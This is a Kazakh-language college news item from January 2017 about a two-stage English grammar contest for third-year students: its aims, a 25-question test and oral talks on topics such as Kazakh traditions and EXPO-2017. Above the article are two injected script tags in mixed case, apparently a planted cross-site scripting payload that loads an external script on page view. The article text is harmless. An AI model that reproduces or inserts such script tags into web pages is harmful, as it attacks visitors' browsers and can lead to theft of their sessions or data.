<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

18.01.2017

«Шетел тілі» пәні бойынша апталықтың шеңберінде «Grammar is a piano I play by ear» атты грамматикалық сайыс өткізілді. Сайыс 2 кезеңнен тұрды және ағылшын бөлімінің 3 курс студенттері (А-31, А-32) арасында ұйымдастырылды. Грамматикалық сайысты өткізуде келесі мақсаттар көзделді:

1.      Студенттердің ағылшын тілі грамматикасынан білім деңгейін тексеру және саралау;

2.      Студенттердің шығармашылық қабілеттерін және сөйлеу дағдыларын дамытуға ықпал ету;

3.      Тілдік қарым-қатынас мәдениетін қалыптастыру;

4.      Ағылшын тілін жетік меңгерген қабілетті студенттерді анықтау;

5.      Шетел тілін меңгерген тұлғаны тәрбиелеу;

6.      Қазақстандық патриотизмді нығайту және өзге халықтардың мәдениеті мен тілін құрметтеу.

Студенттер сайыстың 1 кезеңінде әр түрлі грамматикалық тақырыптар бойынша тест тапсырмаларын орындады. 25 сұрақтың 20 сұрағына дұрыс жауап берген студенттер 2 кезеңге өтті.  2 кезеңде студенттер ағылшын тілінде берілген тақырыптар бойынша грамматикалық құрылымдарды пайдалана отырып ауызша сөйледі. Тақырыптар Қазақтың ұлттық салт-дәстүрлері, Қазақтың ұлттық музыкалық аспаптары, ЭКСПО-2017, Қазақтың ұлттық тағамдары, У.Шекспирдің өмірі, А.Құнанбаев, Ә.Бөкейхановтың өмірі және т.б. мазмұнда болды. Қатысушылар берілген тақырыптар бойынша өз білімдерін көрсетіп, ағылшын тілін жақсы деңгейде меңгергенін дәлелдей алды.

Просмотров: 685


Пікір қосу



Деректерді қолтаңбаға қосу